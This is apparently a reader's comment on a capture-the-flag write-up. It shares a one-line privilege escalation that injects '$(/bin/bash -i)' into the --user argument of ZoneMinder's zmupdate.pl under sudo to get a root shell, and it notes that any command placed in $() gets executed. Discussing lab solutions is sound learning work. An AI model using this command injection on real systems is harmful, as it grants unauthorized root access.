I just solved the box using the following command:
"sudo /usr/bin/zmupdate.pl --version=1 --user='$(/bin/bash -i)' --pass=ZoneMinderPassword2023".
This command directly spawns a shell with root privileges, providing a simpler and cleaner method for privilege escalation.
The key aspect of this vulnerability is that you can insert any command within the $() variable and the binary will execute it. This information should be included in your post to clarify for readers that the solution is not limited to executing a reverse shell using busybox.
However, great post. Keep up the good work.